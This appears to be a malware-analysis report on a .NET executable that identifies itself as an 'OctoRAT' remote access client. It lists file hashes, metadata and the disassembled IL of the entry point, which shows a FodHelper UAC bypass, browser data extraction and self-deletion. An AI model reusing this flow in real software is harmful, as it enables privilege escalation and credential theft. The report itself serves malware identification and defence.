5922a1adc691970e850e406a18bfec57
PE Executable | MD5: 5922a1adc691970e850e406a18bfec57 | Size: 420.86 KB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 5922a1adc691970e850e406a18bfec57
|
| Sha1 | 10986a370ffcb3dfd4cc07bdf7b7d8fb18cf5e0d
|
| Sha256 | 70a06f67fc7478f77ba341fbbe10aaaa00cafc06dcd948c3e623914d4a5e2c35
|
| Sha384 | 399e26f5d15a1331f9125b7130d5ada8fa4fac23fa69b9e02bf5bdab4be6349ea78ed4bf7d2cc353c5053916d56bddab
|
| Sha512 | fc55690d30d0ec3410a850a5047a13f739983d80a289b8418d434c7ecc325d9863348f5ea504ba166b3c976b11a38f8b3b0d84f816ce232d5f4fb261697789cb
|
| SSDeep | 6144:VPJiQz7AGn4oXNJA91sL59j17WimTvpqBZi4PjAuMofwa50qHY9bHLMgdMN5A:2QzLnXA9qLJ7WFm/jT50ty5A
|
| TLSH | 6B94D69067F94604F2FF2F79A9B245114A76BC93AC35D34E098694DE0EB3B81DC21B63
|
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\sulum\OneDrive\Desktop\server\server\stubCsharp\obj\Release\Client.pdb |
| Module Name | Client.exe |
| Full Name | Client.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Client.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Client |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 3558 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 116 |
| Main IL | call System.Void BrowserDataExtractor.iamfine::EnsureBouncyCastleDLL() ldstr [{0:yyyy-MM-dd HH:mm:ss}] === RMM Client Starting === call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::IsRunningElevated() brtrue IL_0131: ldc.i4.1 call System.String Client.ResourceReader::GetConfig() stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldloc.1 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_005E: ldloc.2 ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 124 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.3 <null> ldloc.3 <null> ldlen <null> conv.i4 <null> ldc.i4.5 <null> blt.s IL_005E: ldloc.2 ldloc.3 <null> ldc.i4.4 <null> ldelem.ref <null> ldstr true call System.Boolean System.String::op_Equality(System.String,System.String) stloc.2 <null> ldloc.2 <null> brfalse IL_0118: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Not running as admin, attempting FodHelper UAC bypass... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::BypassUACFodHelper() brfalse.s IL_00A8: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas..." ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass successful, process will restart elevated call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) ret <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.s V_4 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.s V_4 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave IL_018A: ret pop <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass failed, continuing without elevation call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0131: ldc.i4.1 ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4.1 <null> ldstr OctoRAT_Client_Mutex_{B4E5F6A7-8C9D-0E1F-2A3B-4C5D6E7F8A9B} ldloca.s V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.s V_5 ldloc.0 <null> brtrue.s IL_0145: nop leave.s IL_018A: ret nop <null> call System.Void Client.Program::Initialize() call System.Void Client.Program::Run() leave.s IL_018A: ret stloc.s V_6 ldstr Fatal error: ldloc.s V_6 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void Client.Program::WriteLog(System.String) leave.s IL_018A: ret call System.Void Client.Program::Cleanup() ldsfld System.Boolean Client.Program::meltEnabled brfalse.s IL_017D: endfinally call System.Void Client.Program::SelfDelete() endfinally <null> ldloc.s V_5 brfalse.s IL_0189: endfinally ldloc.s V_5 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> |